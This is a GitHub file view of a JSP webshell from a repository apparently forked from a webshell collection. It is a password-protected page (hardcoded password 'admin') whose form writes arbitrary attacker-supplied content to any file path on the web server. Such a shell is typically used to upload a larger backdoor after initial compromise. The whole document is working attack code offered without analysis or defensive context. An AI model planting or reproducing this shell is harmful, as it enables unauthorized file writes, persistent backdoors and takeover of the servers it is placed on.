forked from backlion/webshell
-
Notifications
You must be signed in to change notification settings - Fork 0
/
hahahaha小马.JSp
69 lines (68 loc) · 2.08 KB
/
hahahaha小马.JSp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
<%@page contentType="text/html; charset=GBK" import="java.io.*;"%>
<%!private String password="admin";//?·??????????BC??????%>
<html>
<head>
<title>hahahaha</title>
</head>
<body bgcolor="#ffffff">
<%
String act="";
String path=request.getParameter("path");
String content=request.getParameter("content");
String url=request.getRequestURI();
String url2=request.getRealPath(request.getServletPath());
try
{act=request.getParameter("act").toString();}
catch(Exception e){}
if(request.getSession().getAttribute("hehe")!=null)
{
if(request.getSession().getAttribute("hehe").toString().equals("hehe"))
{
if (path!=null && !path.equals("") && content!=null && !content.equals(""))
{
try{
File newfile=new File(path);
PrintWriter writer=new PrintWriter(newfile);
writer.println(content);
writer.close();
if (newfile.exists() && newfile.length()>0)
{
out.println("<font size=3 color=red>save ok!</font>");
}else{
out.println("<font size=3 color=red>save erry!</font>");
}
}catch(Exception e)
{
e.printStackTrace();
}
}
out.println("<form action="+url+" method=post>");
out.println("<font size=3><br></font><input type=text size=54 name='path'><br>");
out.println("<font size=3 color=red>"+url2+"</font><br>");
out.println("<textarea name='content' rows=15 cols=50></textarea><br>");
out.println("<input type='submit' value='save!'>");
out.println("</form>");
}
}else{
out.println("<div align='center'><form action='?act=login' method='post'>");
out.println("<input type='password' name='pass'/>");
out.println("<input type='submit' name='update' class='unnamed1' value='Login' />");
out.println("</form></div>");
}if(act.equals("login"))
{
String pass=request.getParameter("pass");
if(pass.equals(password))
{
session.setAttribute("hehe","hehe");
String uri=request.getRequestURI();
uri=uri.substring(uri.lastIndexOf("/")+1);
response.sendRedirect(uri);
}else
{
out.println("Error");
out.println("<a href='javascript:history.go(-1)'><font color='red'>go back</font></a></div><br>");
}
}
%>
</body>
</html>